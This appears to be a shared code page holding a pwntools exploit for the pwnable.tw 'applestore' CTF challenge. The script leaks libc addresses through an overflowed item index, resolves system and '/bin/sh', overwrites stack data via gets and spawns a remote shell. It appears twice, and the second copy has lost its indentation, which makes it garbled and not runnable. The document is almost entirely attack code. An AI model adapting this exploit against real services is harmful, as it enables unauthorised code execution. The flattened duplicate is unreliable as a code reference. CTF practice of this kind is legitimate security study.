H4niz · June 5, 2018 17:10
diff --git a/pl.py b/pl.py
 from pwn import *
 import sys

 host = "chall.pwnable.tw"
 port = 10104

 if len(sys.argv) < 2:
 	io = process("./applestore", env={"_LD_PRELOAD": "libc_32.so.6"})
 	elf = ELF("applestore")
 	context.arch = "i386"
 	libc = ELF("/lib/i386-linux-gnu/libc-2.19.so")

 else:
 	io = remote(host, port)
 	libc = ELF("libc_32.so.6")
 	context.arch = "i386"

 data = dict()

 def Add( idx ):
 	io.recvuntil("> ")
 	io.sendline("2")

 	io.recvuntil("Device Number> ")
 	io.sendline( str(idx) )
 	if "Brilliant!" in io.recvuntil("idea."):
 		log.success("Added!\n")


 def Cart():
 	io.recvuntil("> ")
 	io.sendline("4")

 	io.recvuntil("(y/n) >")

 def Check():
 	io.recvuntil("> ")
 	io.sendline("5")

 	io.recvuntil("(y/n) >")
 	io.sendline("y")

 def Remove( idx ):
 	io.recvuntil("> ")
 	io.sendline("3")

 	io.recvuntil("Item Number> ")
 	io.sendline( str(idx) )

 	# b *0x0804886B
 	# b *0x08048C63
 	# b *0x08048829
 	# b *0x0804884A
 if len(sys.argv) < 2:
 	gdb.attach(io, """
 		b *0x08048BD3
 		b *0x08048C0B
 		b *0x080489FD
 		b *0x08048BBB
 		b *0x08048B80
 		b *0x08048A6F
 		""")

 myCart = 0x0804B068
 Cart = 0x0804B070
 bss = 0x804b000 + 0x100

 for i in xrange(12):
 	Add(1) #199

 for i in xrange(8):
 	Add(2) #299

 for i in xrange(6):
 	Add(4) #399

 Check()


 overflowindex = "27" + p32(0x0804b040) + "\x00"*8 + p32(bss) #bss+0x100

 Remove(overflowindex)

 # Check()
 print io.recvuntil(":")
 atoi_add = u32((io.recv(4)))
 io.recvline()

 # Check()

 libc_base = atoi_add - libc.symbols['atoi']
 system = libc_base + libc.symbols['system']
 sh = next(libc.search('/bin/sh\x00')) + libc_base
 environ = libc_base + libc.symbols['environ']
 gets = libc_base + libc.symbols['gets']
 print "[+] atoi: %#x" %(atoi_add)
 print "[+] environ_off: %#x" %libc.symbols['environ']

 overflowindex = "27" + p32(environ) + "\x00"*12
 Remove(overflowindex)

 print io.recvuntil(":")
 environ = u32(io.recv(4))
 io.recvline()
 print "environ: %#x" %(environ)
 print "[+] gets: %#x" %gets
 nptr = environ-0xe4
 ebp = environ - 0xc4

 print "nptr: %#x\nebp: %#x" %(nptr, ebp)

 overflowindex = "27" + p32(gets) + p32(0xdeadbeef) + p32(nptr) + p32(ebp-0x8)
 Remove(overflowindex)
 io.recvline()

 io.recvuntil("> ")
 io.sendline("06" + p32(0xdeadbeef) + p32(system) + p32(sh)*2 )


 io.interactive()
	from pwn import *
	import sys

	host = "chall.pwnable.tw"
	port = 10104

	if len(sys.argv) < 2:
	io = process("./applestore", env={"_LD_PRELOAD": "libc_32.so.6"})
	elf = ELF("applestore")
	context.arch = "i386"
	libc = ELF("/lib/i386-linux-gnu/libc-2.19.so")

	else:
	io = remote(host, port)
	libc = ELF("libc_32.so.6")
	context.arch = "i386"

	data = dict()

	def Add( idx ):
	io.recvuntil("> ")
	io.sendline("2")

	io.recvuntil("Device Number> ")
	io.sendline( str(idx) )
	if "Brilliant!" in io.recvuntil("idea."):
	log.success("Added!\n")


	def Cart():
	io.recvuntil("> ")
	io.sendline("4")

	io.recvuntil("(y/n) >")

	def Check():
	io.recvuntil("> ")
	io.sendline("5")

	io.recvuntil("(y/n) >")
	io.sendline("y")

	def Remove( idx ):
	io.recvuntil("> ")
	io.sendline("3")

	io.recvuntil("Item Number> ")
	io.sendline( str(idx) )

	# b *0x0804886B
	# b *0x08048C63
	# b *0x08048829
	# b *0x0804884A
	if len(sys.argv) < 2:
	gdb.attach(io, """
	b *0x08048BD3
	b *0x08048C0B
	b *0x080489FD
	b *0x08048BBB
	b *0x08048B80
	b *0x08048A6F
	""")

	myCart = 0x0804B068
	Cart = 0x0804B070
	bss = 0x804b000 + 0x100

	for i in xrange(12):
	Add(1) #199

	for i in xrange(8):
	Add(2) #299

	for i in xrange(6):
	Add(4) #399

	Check()


	overflowindex = "27" + p32(0x0804b040) + "\x00"*8 + p32(bss) #bss+0x100

	Remove(overflowindex)

	# Check()
	print io.recvuntil(":")
	atoi_add = u32((io.recv(4)))
	io.recvline()

	# Check()

	libc_base = atoi_add - libc.symbols['atoi']
	system = libc_base + libc.symbols['system']
	sh = next(libc.search('/bin/sh\x00')) + libc_base
	environ = libc_base + libc.symbols['environ']
	gets = libc_base + libc.symbols['gets']
	print "[+] atoi: %#x" %(atoi_add)
	print "[+] environ_off: %#x" %libc.symbols['environ']

	overflowindex = "27" + p32(environ) + "\x00"*12
	Remove(overflowindex)

	print io.recvuntil(":")
	environ = u32(io.recv(4))
	io.recvline()
	print "environ: %#x" %(environ)
	print "[+] gets: %#x" %gets
	nptr = environ-0xe4
	ebp = environ - 0xc4

	print "nptr: %#x\nebp: %#x" %(nptr, ebp)

	overflowindex = "27" + p32(gets) + p32(0xdeadbeef) + p32(nptr) + p32(ebp-0x8)
	Remove(overflowindex)
	io.recvline()

	io.recvuntil("> ")
	io.sendline("06" + p32(0xdeadbeef) + p32(system) + p32(sh)*2 )


	io.interactive()
No results found